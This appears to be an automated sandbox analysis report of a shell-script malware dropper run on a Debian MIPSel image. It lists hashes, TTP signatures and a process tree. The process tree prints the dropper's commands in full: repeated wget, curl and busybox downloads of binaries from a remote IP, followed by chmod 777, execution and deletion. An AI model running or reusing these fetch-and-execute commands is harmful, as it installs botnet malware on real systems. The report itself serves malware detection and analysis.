Analysis
-
max time kernel
69s -
max time network
97s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
-
Size
10KB
-
MD5
d230b0059d55644a966d0f2b3a653b23
-
SHA1
003616a6507ccbca767f2e56341b347b94f487da
-
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
-
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
-
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 781 chmod 929 chmod 736 chmod 756 chmod 836 chmod 905 chmod 947 chmod 953 chmod 971 chmod 917 chmod 935 chmod 941 chmod 965 chmod 893 chmod 818 chmod 863 chmod 881 chmod 887 chmod 899 chmod 923 chmod 742 chmod 869 chmod 875 chmod 911 chmod 959 chmod 729 chmod 805 chmod 812 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 730 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 737 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 743 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 757 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 782 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 807 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 813 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 819 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 838 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 864 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 870 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 876 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 882 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 888 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 894 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 900 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 906 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 912 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 918 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 924 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 930 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 936 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 942 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 948 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 954 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 960 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 966 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 972 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl
Processes
-
/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:706
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:727
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:735
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:741
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:749
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:778
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:803
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:811
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:817
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:832
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:854
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:868
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:874
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:880
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:886
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:892
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:898
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:904
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:910
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:916
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:922
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:928
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
